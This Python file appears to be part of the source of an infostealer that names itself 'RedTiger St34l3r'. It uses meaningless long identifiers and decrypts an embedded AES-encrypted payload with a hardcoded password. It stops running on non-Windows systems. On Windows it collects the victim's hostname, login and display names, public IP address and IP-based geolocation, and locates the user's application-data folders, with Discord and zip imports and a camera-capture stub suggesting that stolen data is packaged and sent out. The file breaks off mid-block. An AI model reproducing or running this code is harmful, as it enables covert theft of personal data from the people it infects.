
import sys

def JYLDAHPNLUXZZSLWSBLINGUWIKZXYOEHXMNQZTUZBHRLNTDCVJVXMMHSDLCNNAOHCHUMAUVJ():
    def ZYEFMJKSJSIACIGBVHZGKRFIGSIHNBHZWHKWLJPWLXGERPBAXNFILLFIPTBOZMBDYPPOHAH():
        if sys.platform.startswith("win"):
            return False
        else:
            return True
    
    try: 
        CMIJPCGADFWOVQNZHAWGANMCJNIQTXBBXCWJGWNEOETACFRNAFNOQJLGRNMYQPHTEWMGLFTZKYLJRXZIAC = ZYEFMJKSJSIACIGBVHZGKRFIGSIHNBHZWHKWLJPWLXGERPBAXNFILLFIPTBOZMBDYPPOHAH()
        if CMIJPCGADFWOVQNZHAWGANMCJNIQTXBBXCWJGWNEOETACFRNAFNOQJLGRNMYQPHTEWMGLFTZKYLJRXZIAC == True:
            return CMIJPCGADFWOVQNZHAWGANMCJNIQTXBBXCWJGWNEOETACFRNAFNOQJLGRNMYQPHTEWMGLFTZKYLJRXZIAC
    except:
        return True
    
if JYLDAHPNLUXZZSLWSBLINGUWIKZXYOEHXMNQZTUZBHRLNTDCVJVXMMHSDLCNNAOHCHUMAUVJ() == True:
    sys.exit()
    
import os
import socket
import win32api
import requests
import base64
import ctypes
import threading
import discord
import zipfile
import io
from json import loads
from urllib.request import urlopen
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend

def SJRJOHAXPUEBRBKTMATFUNLKHYGATPQYKSZNUQYQTIYELEWTRRRIFTKFMFQPGDSJQPNNEJRQEOKMDYI(TOWWUXFUPEZYQBJVRVHUNEIYEUUTQNMFVEXHNXMFIKPWVHDSMVRVTWYCWNZYFQZDEUQAIIMUNWJGUUYVOMA): 
    CMIJPCGADFWOVQNZHAWGANMCJNIQTXBBXCWJGWNEOETACFRNAFNOQJLGRNMYQPHTEWMGLFTZKYLJRXZIAC_system_info = None
    return CMIJPCGADFWOVQNZHAWGANMCJNIQTXBBXCWJGWNEOETACFRNAFNOQJLGRNMYQPHTEWMGLFTZKYLJRXZIAC_system_info

def GRCXJFURVWLOYNYABVVSOMWPNXYDHQWJZBDYMCQWRKVXXAJYJZBHKDBQKAUXNNAHSLD(TOWWUXFUPEZYQBJVRVHUNEIYEUUTQNMFVEXHNXMFIKPWVHDSMVRVTWYCWNZYFQZDEUQAIIMUNWJGUUYVOMA):
    SARLBJUIRIVQCXCXIRRCKPBLHFQNZGRJIRNNZNFPTDIFZPMIPTSHEEJYAX = None
    return SARLBJUIRIVQCXCXIRRCKPBLHFQNZGRJIRNNZNFPTDIFZPMIPTSHEEJYAX

def AXYIGABCUKOEWXFZZCKFYUNKPUTNVVDULYLJZHFKNYESIWRPQRQKMZOPPCHTUUKSXEUEW(TOWWUXFUPEZYQBJVRVHUNEIYEUUTQNMFVEXHNXMFIKPWVHDSMVRVTWYCWNZYFQZDEUQAIIMUNWJGUUYVOMA):
    BVZLLRJCYLIHINCCWHKRMRIKRZAOGFKHTVCUSICVIYBCDSBZUJRQXMERFRWBNNPNYL = None
    return BVZLLRJCYLIHINCCWHKRMRIKRZAOGFKHTVCUSICVIYBCDSBZUJRQXMERFRWBNNPNYL

def CQKCGLPZABNAWLCHVWAISPRSAUNJHGDEEZGQQSNBXSQBTQHVZXBFQEMULFYYIGMIWNEXG(): 
    PLTBISXOVUHRJRGXVJQOSLGWMFHYZTEBBQFDCBCZAAWGGXCBINVLBVWOJQRLSZBSNJWENAUGEEGSUJKDDFLEYTQWKSKPSRNHEZC = None
    return PLTBISXOVUHRJRGXVJQOSLGWMFHYZTEBBQFDCBCZAAWGGXCBINVLBVWOJQRLSZBSNJWENAUGEEGSUJKDDFLEYTQWKSKPSRNHEZC

def CUHNOFRNZGGSHNHVRKQVNMEZOZCJUPYWXKGKMHYWCNAIPUVNIQPQMMMODMARQJJFBWHRTVAZIPNJUIJAWPSDXEXZDFMPKJE(TOWWUXFUPEZYQBJVRVHUNEIYEUUTQNMFVEXHNXMFIKPWVHDSMVRVTWYCWNZYFQZDEUQAIIMUNWJGUUYVOMA): 
    QJVMSWWRKJNPSIYCGICDQMPNVDRAWKEDDPJQXKQHAGXOEWEJNMWEAGRGZNBLAXEQJLJSTBALPCZDHXYSIOYVYGUSHYH = None
    EVEBGMFNCZISLHWURZTVOFCVRZYWNRXCWDOKZOOHMCCOOVWTATICDKHCKZXQNOFEATIHMPTVUBGVFYISRDTJNLYDWBNNSW = None
    LYPWCPDVIDCGKYKCRZRTWJAMSXWNOIOCERTWZUJLUIKAFCUQTAWKOVGALDUEXWUENQQQTAUFSYIAECTPOACFEWVJNKKDVPIXG = None
    ZMXSPIEQIAPIZAURQQBPTZGQTCBYPGKVLLGWKTHEXKQIRGCUNNRJGSFSOAFITLRWEI = None
    BNTMLWGLFFHEAJYVHZPAXIDRKPIUQBKUCZKKZDCFCAJCCRTDLKMASQUGPJEPBXBLVRXBT = None
    NFEXAEMPGGYEFRFQZGWLNECNEFVDHJFEGMNJJUUHXNDNXGTAZDKADZCXXLPFAATDXMPWGZHFUFEANZRTANISNBWHOIVRXDLYJ = None
    return QJVMSWWRKJNPSIYCGICDQMPNVDRAWKEDDPJQXKQHAGXOEWEJNMWEAGRGZNBLAXEQJLJSTBALPCZDHXYSIOYVYGUSHYH, EVEBGMFNCZISLHWURZTVOFCVRZYWNRXCWDOKZOOHMCCOOVWTATICDKHCKZXQNOFEATIHMPTVUBGVFYISRDTJNLYDWBNNSW, LYPWCPDVIDCGKYKCRZRTWJAMSXWNOIOCERTWZUJLUIKAFCUQTAWKOVGALDUEXWUENQQQTAUFSYIAECTPOACFEWVJNKKDVPIXG, ZMXSPIEQIAPIZAURQQBPTZGQTCBYPGKVLLGWKTHEXKQIRGCUNNRJGSFSOAFITLRWEI, BNTMLWGLFFHEAJYVHZPAXIDRKPIUQBKUCZKKZDCFCAJCCRTDLKMASQUGPJEPBXBLVRXBT, NFEXAEMPGGYEFRFQZGWLNECNEFVDHJFEGMNJJUUHXNDNXGTAZDKADZCXXLPFAATDXMPWGZHFUFEANZRTANISNBWHOIVRXDLYJ

def NTOWSSMUWCDBVFSIMBHETDPXETTAXCFHEULUGMHGITAYFMAWCDFWOBGAUSMXFHNTNENSUBOAOHHSKNFRVCSDPCFCGMGZUWEK(TOWWUXFUPEZYQBJVRVHUNEIYEUUTQNMFVEXHNXMFIKPWVHDSMVRVTWYCWNZYFQZDEUQAIIMUNWJGUUYVOMA):
    PKLQUNDHVHGBANMMGYHMOVAVVRYMXNLYRVDOMRGCBHTAWMLZTA = None
    OZPOYBUMRWOBRSRDOIEZAKSTBWNGQFLBDGEJCELVOEAYAPCEGWOCTTVD = None
    QTLLCDKDUUDNVVEDYXAVIMDJGHBBOGZXBUHQMYYBEHLLQFDRCTDASOZBSLZXGSKXACMCMMCGXAYFOOUCFCBGFAABBBLLLFFCAWJS = None
    return PKLQUNDHVHGBANMMGYHMOVAVVRYMXNLYRVDOMRGCBHTAWMLZTA, OZPOYBUMRWOBRSRDOIEZAKSTBWNGQFLBDGEJCELVOEAYAPCEGWOCTTVD, QTLLCDKDUUDNVVEDYXAVIMDJGHBBOGZXBUHQMYYBEHLLQFDRCTDASOZBSLZXGSKXACMCMMCGXAYFOOUCFCBGFAABBBLLLFFCAWJS

def ZFIKMHSLSYWLIHOBVLEPCWZHRSPXPOUOZJVHQFWDSEOSDLYZKHQ(TOWWUXFUPEZYQBJVRVHUNEIYEUUTQNMFVEXHNXMFIKPWVHDSMVRVTWYCWNZYFQZDEUQAIIMUNWJGUUYVOMA):
    HADGGYUVASHYJSNSSPPLGAKRSMERULPYNTNNLSJCIKBZLUBTPIBQYFQNSBLMMJHSMWMQB = None
    return HADGGYUVASHYJSNSSPPLGAKRSMERULPYNTNNLSJCIKBZLUBTPIBQYFQNSBLMMJHSMWMQB

def URGASTEOAIEVXCVTZKGHUODWXUGVFBSPSETLHISVRGAXKBZQAQXUJICRFODGDEUYTJLVDUKVJDPQQMRLKMEZBNWU(TOWWUXFUPEZYQBJVRVHUNEIYEUUTQNMFVEXHNXMFIKPWVHDSMVRVTWYCWNZYFQZDEUQAIIMUNWJGUUYVOMA):
    CMIJPCGADFWOVQNZHAWGANMCJNIQTXBBXCWJGWNEOETACFRNAFNOQJLGRNMYQPHTEWMGLFTZKYLJRXZIAC_camera_capture = None
    return CMIJPCGADFWOVQNZHAWGANMCJNIQTXBBXCWJGWNEOETACFRNAFNOQJLGRNMYQPHTEWMGLFTZKYLJRXZIAC_camera_capture

def KNNWBKAYMOLWQJZNPDGSMATUTRHJBZHEACSVSFIWMJVEYGDRUIFKTLDPRGIGRBSVFRSLA(TOWWUXFUPEZYQBJVRVHUNEIYEUUTQNMFVEXHNXMFIKPWVHDSMVRVTWYCWNZYFQZDEUQAIIMUNWJGUUYVOMA): 
    HCJNCPBQRTSNLJRTQJZPNFRAKMMUBNDBYEYOFLCOJUUBIFYJBDNGCFJEG = None
    return HCJNCPBQRTSNLJRTQJZPNFRAKMMUBNDBYEYOFLCOJUUBIFYJBDNGCFJEG

def GJEWAUTIHXZGGDRWHOTGWJEWMENEILLGYIVBHPVCXZFJJKBJNUJIHEQHYKSZARGQOBCVIMVCVQMYGIFDESHWQ(): pass
def PNRXALMBVTDJPOKVWMDXFZJOFKKSNHIWEARYFLMCRBRFSYGRGWYBSVWCJYDRNJIMXWEIZCZGRLXLVTQYLAGQVHDUQIVY(): pass
def BZQOLJPSDRPWZIBPTMKCOZAOZSPUCIINRGWRPRXFGOFHGJROPBJEGDMOBEOUWJZRGMNDVHOPMGQGWBXRZDSXODPB(): pass
def KCEVUFBZUOSRNDHTKQHBDWJBILAMERITDDMFARSBASXLUSASZFNFBBAWTKMIVRKTPZDQWMEGYQMCHZEWLZRAKASAKXGDEOGB(): pass
def PDLHYKTLZTYTZENLYCBHCLWVJCDRUXJZHJLDOYRVFUZPGBMAAMVMPNIYCMVTGIMRSGDQMDLVMLDRYRFCNBYQNRPUNTSFUTWWBM(): pass
def BREZKPDFGXUOHJSYORUXMNRBGJBIRFWZEFILAMITFHXSBWUYBLJNUI(): pass
def XHEUMFFYZJOMXGLKYTOBSCMEXWXIBPEBDTDTECIJUXQMYABEHCAGREYKGRPNSTTYEL(): pass
def XQOQHVLXLGJPOLJWDAXZUTFWYJAVQMZMYGEPRKAZLQECPKAQEXBWZMIVGGPEFTUCLSTCQVHBVEWXKFXBQIJW(): pass
def GRJQLZSJPEFZZBPXSTQUDTNLXHZLIQDOWTOZZAEIDNNLNOUCPXSBSVCUFKQQZAPOGHVVFOAHBHPDTQCYTBY(): pass
def PTADAEVUTPSWCIRRYTQUEJONVXPXJWEICHBFPATJFPCFOLLBPOFWSKDIWWWHU(): pass
def YKBKKSEFLJEKNWCVDZWGMYABEXGSAHSRBCEYNEYDNUFVPJCHPGRWIBPJRTJLTUWVHVP(): pass
def EBBQGEBBUKCCLIPHBKVGQWJIMNXDVQEUSXBXZOHDIHIUTXAXGAOIMAVITUUYXMNMHGCTZIMTQKL(): pass

def GIYYAOCXWFTABQNJJBDUHMRCZIPNNGMBBDQVJVAYIKXJAJOBKROGKFGUROPSQZFST(title):
    try:
        if sys.platform.startswith("win"):
            ctypes.windll.kernel32.SetConsoleTitleW(title)
        elif sys.platform.startswith("linux"):
            sys.stdout.write(f"\x1b]2;{title}\x07")
    except:
        pass
        
def FVCRUOCSRLTXHTPIZRECVQJDJCHJOGBCQDPMVZKZNREEQVKXIBLYKVRMNHOOKZGYTWTXURFMLSGVEVRMEF():
    try:
        if sys.platform.startswith("win"):
            os.system("cls")
        elif sys.platform.startswith("linux"):
            os.system("clear")
    except:
        pass

def MSPMXSESNNXOMAXAQMHQWNTXQTPESNPAUQPOOFIBUPNZZCPFGKIUTJYIDCZQKGBWMSDVNKUAHGANYJLCREJV(ZXKACBEJSILPVSYBBOPDDCQYDNSBNWTVFPJXVHJJMORMGYQYUBTUNFNGTO, CGXZAETWJWCCZHOHTDXTDGHDJENKAARJVNGFKHXNHIXVBEFEBXNFFGFW):
    def GGSJHZZTRUJTCANYGXFFTOBWPRIJXRYDLXTYELKVYWSDEVXIBEOMCVPVIZUTCVPGWZYSQPXJHEDYCERKCXGBVYLSLLVZUWVD(HYDPFOHJSQEHLIEOJKNUZUUEYBXLDBUOSHMOZJECGSCCPUBAXUGMLWVRUNKACBORELTUEYGT, PTKBFBNLVWCHCJNZZOSKIXUXXYKPDEKOZPDDWFAZKGJRIUUJCLRNTPXSIAJJIK):
        FSEIRDZOXVCGDLSRAGHYTIKRNRHYMARXSKRRCKMJDVGWVSRUMDIPWOYJPSHLJHS = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=PTKBFBNLVWCHCJNZZOSKIXUXXYKPDEKOZPDDWFAZKGJRIUUJCLRNTPXSIAJJIK, iterations=100000, backend=default_backend())
        if isinstance(HYDPFOHJSQEHLIEOJKNUZUUEYBXLDBUOSHMOZJECGSCCPUBAXUGMLWVRUNKACBORELTUEYGT, str):  
            HYDPFOHJSQEHLIEOJKNUZUUEYBXLDBUOSHMOZJECGSCCPUBAXUGMLWVRUNKACBORELTUEYGT = HYDPFOHJSQEHLIEOJKNUZUUEYBXLDBUOSHMOZJECGSCCPUBAXUGMLWVRUNKACBORELTUEYGT.encode()  
        return FSEIRDZOXVCGDLSRAGHYTIKRNRHYMARXSKRRCKMJDVGWVSRUMDIPWOYJPSHLJHS.derive(HYDPFOHJSQEHLIEOJKNUZUUEYBXLDBUOSHMOZJECGSCCPUBAXUGMLWVRUNKACBORELTUEYGT)

    ZXKACBEJSILPVSYBBOPDDCQYDNSBNWTVFPJXVHJJMORMGYQYUBTUNFNGTO_data = base64.b64decode(ZXKACBEJSILPVSYBBOPDDCQYDNSBNWTVFPJXVHJJMORMGYQYUBTUNFNGTO)
    PTKBFBNLVWCHCJNZZOSKIXUXXYKPDEKOZPDDWFAZKGJRIUUJCLRNTPXSIAJJIK = ZXKACBEJSILPVSYBBOPDDCQYDNSBNWTVFPJXVHJJMORMGYQYUBTUNFNGTO_data[:16]
    FMYNMBDGMVLTUXYLWWZRVNWJAMANQFVZEXDUYLFNYVJNDXQJWKZGOPDKRGWXHDASGVYOHIDJNMFOGVLJRTJE = ZXKACBEJSILPVSYBBOPDDCQYDNSBNWTVFPJXVHJJMORMGYQYUBTUNFNGTO_data[16:32]
    ZXKACBEJSILPVSYBBOPDDCQYDNSBNWTVFPJXVHJJMORMGYQYUBTUNFNGTO_data = ZXKACBEJSILPVSYBBOPDDCQYDNSBNWTVFPJXVHJJMORMGYQYUBTUNFNGTO_data[32:]
    EGUAAWIVVMVJUXTBPPVZCJNJXPULOOCFJAVJLVQAUTWZBPNIXOCHFFFVBYITJPCIXVDCFTO = GGSJHZZTRUJTCANYGXFFTOBWPRIJXRYDLXTYELKVYWSDEVXIBEOMCVPVIZUTCVPGWZYSQPXJHEDYCERKCXGBVYLSLLVZUWVD(CGXZAETWJWCCZHOHTDXTDGHDJENKAARJVNGFKHXNHIXVBEFEBXNFFGFW, PTKBFBNLVWCHCJNZZOSKIXUXXYKPDEKOZPDDWFAZKGJRIUUJCLRNTPXSIAJJIK)
    HOQSOVZFERKWZEBPJLVLKQIRHZZOLJCDNYCYGLLMKPNDRVEGXMHPEFJBUQIACXCDHBGAHFDDMNFNZDURUBVCRPWAQVVLUOZ = Cipher(algorithms.AES(EGUAAWIVVMVJUXTBPPVZCJNJXPULOOCFJAVJLVQAUTWZBPNIXOCHFFFVBYITJPCIXVDCFTO), modes.CBC(FMYNMBDGMVLTUXYLWWZRVNWJAMANQFVZEXDUYLFNYVJNDXQJWKZGOPDKRGWXHDASGVYOHIDJNMFOGVLJRTJE), backend=default_backend())
    VEMVDURJEOPJJMAHGZZEZQFQZKJMSNFWCIVWCOHQMDUYVHYNRWVFYUPCVBGEOCHPTDLOXXGGMIVWNWTSSMNRPVOTMQVZX = HOQSOVZFERKWZEBPJLVLKQIRHZZOLJCDNYCYGLLMKPNDRVEGXMHPEFJBUQIACXCDHBGAHFDDMNFNZDURUBVCRPWAQVVLUOZ.decryptor()
    XDORBSFISINDTBTYNQSXZDFEHYUYCXSQEPPHVVQEEZFFYZJYITVBVVHNPODE = VEMVDURJEOPJJMAHGZZEZQFQZKJMSNFWCIVWCOHQMDUYVHYNRWVFYUPCVBGEOCHPTDLOXXGGMIVWNWTSSMNRPVOTMQVZX.update(ZXKACBEJSILPVSYBBOPDDCQYDNSBNWTVFPJXVHJJMORMGYQYUBTUNFNGTO_data) + VEMVDURJEOPJJMAHGZZEZQFQZKJMSNFWCIVWCOHQMDUYVHYNRWVFYUPCVBGEOCHPTDLOXXGGMIVWNWTSSMNRPVOTMQVZX.finalize()
    XOWFQQRWTLIFMAKLCYYVWPXUGIFXGAHJPFWANPKHHMMVNTVQRBUBTKSMCRCQFMQYLVQGXDSENFZTUUIHJCLSHVVWWQEVQFNSICDW = padding.PKCS7(128).unpadder()
    QZYINDCUSWYXXCUVPFZKJHDPVYPWCWPTQYUCLEZSNCUQGHLYCBNMMDE = XOWFQQRWTLIFMAKLCYYVWPXUGIFXGAHJPFWANPKHHMMVNTVQRBUBTKSMCRCQFMQYLVQGXDSENFZTUUIHJCLSHVVWWQEVQFNSICDW.update(XDORBSFISINDTBTYNQSXZDFEHYUYCXSQEPPHVVQEEZFFYZJYITVBVVHNPODE) + XOWFQQRWTLIFMAKLCYYVWPXUGIFXGAHJPFWANPKHHMMVNTVQRBUBTKSMCRCQFMQYLVQGXDSENFZTUUIHJCLSHVVWWQEVQFNSICDW.finalize()
    return QZYINDCUSWYXXCUVPFZKJHDPVYPWCWPTQYUCLEZSNCUQGHLYCBNMMDE.decode()

GIYYAOCXWFTABQNJJBDUHMRCZIPNNGMBBDQVJVAYIKXJAJOBKROGKFGUROPSQZFST("")

try: BPMIITVCHRWLPOLISIKNATHJWIDIAQOPQAFRAXBORRJPZEJNXGCPMRCOIPHUESTLUBWSSPSIGWGNBMALZZSIUHDLEAFZYG    = socket.gethostname()
except: BPMIITVCHRWLPOLISIKNATHJWIDIAQOPQAFRAXBORRJPZEJNXGCPMRCOIPHUESTLUBWSSPSIGWGNBMALZZSIUHDLEAFZYG = "None"

try: JZGNRRRESUPFDWRNUUCFHRMBEGFXURWSVRLOQUNRXKFREUAELHGDBUVIGTGGIUOFOPYFVBRMYYUDJAH    = os.getlogin()
except: JZGNRRRESUPFDWRNUUCFHRMBEGFXURWSVRLOQUNRXKFREUAELHGDBUVIGTGGIUOFOPYFVBRMYYUDJAH = "None"

try: JBKJMGRWOZYUUWFGAVGSHZABVRQMYEWOYOXUTEJGVDFZPNABBDFQRVUFO    = win32api.GetUserNameEx(win32api.NameDisplay)
except: JBKJMGRWOZYUUWFGAVGSHZABVRQMYEWOYOXUTEJGVDFZPNABBDFQRVUFO = "None"

try: PSBUASDJQFMGVMPYFHAEVUVQSPZDDZPIQSCFHXNPWKQHZFZKLIFOTIWNNSPFZDRHGBOJTIISIVFQOGMFDK    = requests.get("https://api.ipify.org?format=json").json().get("ip", "None")
except: PSBUASDJQFMGVMPYFHAEVUVQSPZDDZPIQSCFHXNPWKQHZFZKLIFOTIWNNSPFZDRHGBOJTIISIVFQOGMFDK = "None"

try: YKUATTHUYFBPMJVUDILLGEDXADLMYFGUSAYBNKSBCTCJJVKKFGJNZZOELQMNDODGTAYRJNVOLW    = socket.gethostbyname(socket.gethostname())
except: YKUATTHUYFBPMJVUDILLGEDXADLMYFGUSAYBNKSBCTCJJVKKFGJNZZOELQMNDODGTAYRJNVOLW = "None"

NDMOAARZBMBFGBXRGSFFSOWXSELGOZRQWNEGXPOXXYMAQLLTXBAYGKRATFEUIQTAMRTNL = r"""
RqJ1kwiB6UqKv6XHAsYN+qnFiiboyGUSKabUcfzuQP6V01tIV2HgYGmAqqNvirAtyn2FbguQbwmUuZCL1BsTx8HFk2ScAiYuho2RKIzSC4zbUHfsmigI5JpsQF+hvcDmn0M2BWFMpmAxEEuWspbCPYy8eXJcwaiOBWgkHQLwAgoMsJ/PPfYxcr6EmEXI3SwAltWoFqYeTZ8JvQz9DXgIxA==
"""

OOXXUMNEMHQLGXPNTIXNJLYZEPDCEAOPOFZITNQAVRTRRMTVCBFASBIAFARBQESSGYOJYQDSHKHLNLMZRLTWKUZZVIBETXD            = "KYtqbxboWSRliOWDihzYNgdMQYUPSJtZGTugHDOOogcBiJZIqzKzwXvlAsuAJiBevmOcYLKSjziitiPiDZxxYvewlmhJbjFGCzCWvKwLpnatJtVhGMGXnrVshEkzPzSKoFEtRZkUDeGblqVnFwRsYrXHfJ"
JHUBHLCDFWARHELHKISYABZJRMBTGHBMJEJKRELEMUSHYJTTMLIOOKT        = "None"
DTBLRQRAKCSIBOMDLVGWJSQUXZUGUXZBTRIHXJGBJVTFBNBSNUOPYSDKBMEQELVYUNALMIFAMFNNSNAZINKRJMZAJJ    = 0xa80505
ROKFJWCSQOAYRPUMKMQDCSUBOCMXICBQFMDSDCRSMXZRXJNMFBWLMAQYEHARRBL = "RedTiger St34l3r"
SLLMXQDMLWMFYFQXLYIGHEPEBRXNVBQKBDELZYEZPTRUMXOUVGQ   = "https://google.com"
IMGJMYBWYJIGOHYXOAHOEPQTNFZFGUOMCHXIEZMBUOFIRQECWNXYNM    = "RedTiger St34l3r - github.com/loxy0dev/RedTiger-Tools"
HASPZBZWIZFNFZWCNJEIAAQOLDTNIMEXOZTIEKXDNWZLZLSEPMGYO   = {"text": IMGJMYBWYJIGOHYXOAHOEPQTNFZFGUOMCHXIEZMBUOFIRQECWNXYNM, "icon_url": SLLMXQDMLWMFYFQXLYIGHEPEBRXNVBQKBDELZYEZPTRUMXOUVGQ}
ZBXLYSUHEGVCWIWIXTKSRATJUXEVTOZIAMAXGBVWPFNKFLNGCZKGVKKZVETMSIBNELHZKCEGIWWWNXTPTUBNHWXYCBO    = f'`{JZGNRRRESUPFDWRNUUCFHRMBEGFXURWSVRLOQUNRXKFREUAELHGDBUVIGTGGIUOFOPYFVBRMYYUDJAH} "{PSBUASDJQFMGVMPYFHAEVUVQSPZDDZPIQSCFHXNPWKQHZFZKLIFOTIWNNSPFZDRHGBOJTIISIVFQOGMFDK}"`'
DRBVAYCBDJRZUPODFICQCDCGXHWLDNOHXNJHWDXFYHXHBNUJIRXRD    = MSPMXSESNNXOMAXAQMHQWNTXQTPESNPAUQPOOFIBUPNZZCPFGKIUTJYIDCZQKGBWMSDVNKUAHGANYJLCREJV(NDMOAARZBMBFGBXRGSFFSOWXSELGOZRQWNEGXPOXXYMAQLLTXBAYGKRATFEUIQTAMRTNL, OOXXUMNEMHQLGXPNTIXNJLYZEPDCEAOPOFZITNQAVRTRRMTVCBFASBIAFARBQESSGYOJYQDSHKHLNLMZRLTWKUZZVIBETXD)

OFYHQLDRKZIZCOYXUZYWRQWHOHBCTRJHXHBKEMQQQKEJBFEILZBQUYEBMIYU           = os.getenv("WINDIR", None)
GALVZUNVGNVOATIAMJCCVQZFOMTKNMAGZLTNOGHWEVHQCHWGRE       = os.getenv('USERPROFILE', None)
CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF     = os.getenv('LOCALAPPDATA', None)
PNUVPKSVJQKNIOFLOMKZPLDMTEZWFRCTKCDMDNRKSORCIMLVQJUJKWXWGG   = os.getenv('APPDATA', None)
HYIRQSLYDAAZTVHVBKXIFNWUKVJLOOPGADTQKOBUGOQUQGDGKUTCCMVMTRDEVMPSHMRGLJKKEWFWHKIXJPUQKR = os.getenv('ProgramFiles(x86)', None)
if HYIRQSLYDAAZTVHVBKXIFNWUKVJLOOPGADTQKOBUGOQUQGDGKUTCCMVMTRDEVMPSHMRGLJKKEWFWHKIXJPUQKR is None:
    HYIRQSLYDAAZTVHVBKXIFNWUKVJLOOPGADTQKOBUGOQUQGDGKUTCCMVMTRDEVMPSHMRGLJKKEWFWHKIXJPUQKR = os.getenv('ProgramFiles', None)

try:
    LCXDHVJEMDJIIXLWYSNRBDYAOQMQXNIHBZAATTHRYJCMCDERKXIOQKTZEOAYZXPYDTVNOYIGSAAFA = requests.get(f"https://{JHUBHLCDFWARHELHKISYABZJRMBTGHBMJEJKRELEMUSHYJTTMLIOOKT}/api/ip/ip={PSBUASDJQFMGVMPYFHAEVUVQSPZDDZPIQSCFHXNPWKQHZFZKLIFOTIWNNSPFZDRHGBOJTIISIVFQOGMFDK}")
    BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM = LCXDHVJEMDJIIXLWYSNRBDYAOQMQXNIHBZAATTHRYJCMCDERKXIOQKTZEOAYZXPYDTVNOYIGSAAFA.json()

    UVFWCFCSUVAAVZZVEVZHAGIYABQRHBMEDJUNLZHLIDVYPFCVKRQ = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('country', "None")
    UVFWCFCSUVAAVZZVEVZHAGIYABQRHBMEDJUNLZHLIDVYPFCVKRQ_code = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('country_code', "None")
    GGOFXZKAUHDADYFHLDOKLRCLZLJHSRKPQRMGIFMCGYUWYCSBEPEBOYQPRBGYDPTFAT = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('region', "None")
    GGOFXZKAUHDADYFHLDOKLRCLZLJHSRKPQRMGIFMCGYUWYCSBEPEBOYQPRBGYDPTFAT_code = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('region_code', "None")
    IFILGCZUAECFOAJIWQSMLDHLASMOGXCRIRTZOAXJJNVOVNQDJCSMSUCZDYFJSABPRBCTHLNA = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('zip', "None")
    CETGLDYEKVRWEMQFMBOICKQWWCBOPNRSVSVWIGHUXAYOAANWBOGZPEPAVWGOQTHIBGNBTRTTEYWDMSJ = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('city', "None")
    RIYFEORHQUISIUKCCZVKZDEXMPFDKRTZKLGLNAAVRLAEATLEDDRKPDLJQMDNRQKYJHVZAVQKNGHEOVIBYMBMTCJIO = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('latitude', "None")
    HJAPUMGWQUXVUQEBRZBVAFFTCMOENFTXLILKIBNOYEBMNRYDEBHHTKFWBJXPJMIDBKRRBVSJTHPHQNMPKEXACGLHYVUF = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('longitude', "None")
    CRCHZDLOHXGWPNKZQCLROURGJFMBCVMKUPDKJZTVIRIBFSHZAYPMYTOALJHH = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('timezone', "None")
    MEJTYVXQSSAXKJWCAYPGLGLMWVQDAGQNABBYZRHNHVNLMAYJYDDNUJIFKNQTYEJ = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('isp', "None")
    JHRHAPOQGDWFKKKVXRQXBELLRFELAKQAJWFOCQWONGGPZLVNBVPZLMOCNRLHSHKQOMXQPHSDLKIRVRRQNTKIFJKXDJIWR = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('org', "None")
    IBVBCOCFEBNZROATIVEXRBIPNAUNHRLOOSIQCKEDHZPTEQQDKCSHQOJLHAUUBXUVACIUBTLVACWTXJNJGEFNMTDRAP = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('as', "None")
except:
    LCXDHVJEMDJIIXLWYSNRBDYAOQMQXNIHBZAATTHRYJCMCDERKXIOQKTZEOAYZXPYDTVNOYIGSAAFA = requests.get(f"http://ip-api.com/json/{PSBUASDJQFMGVMPYFHAEVUVQSPZDDZPIQSCFHXNPWKQHZFZKLIFOTIWNNSPFZDRHGBOJTIISIVFQOGMFDK}")
    BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM = LCXDHVJEMDJIIXLWYSNRBDYAOQMQXNIHBZAATTHRYJCMCDERKXIOQKTZEOAYZXPYDTVNOYIGSAAFA.json()

    UVFWCFCSUVAAVZZVEVZHAGIYABQRHBMEDJUNLZHLIDVYPFCVKRQ = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('country', "None")
    UVFWCFCSUVAAVZZVEVZHAGIYABQRHBMEDJUNLZHLIDVYPFCVKRQ_code = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('countryCode', "None")
    GGOFXZKAUHDADYFHLDOKLRCLZLJHSRKPQRMGIFMCGYUWYCSBEPEBOYQPRBGYDPTFAT = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('regionName', "None")
    GGOFXZKAUHDADYFHLDOKLRCLZLJHSRKPQRMGIFMCGYUWYCSBEPEBOYQPRBGYDPTFAT_code = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('region', "None")
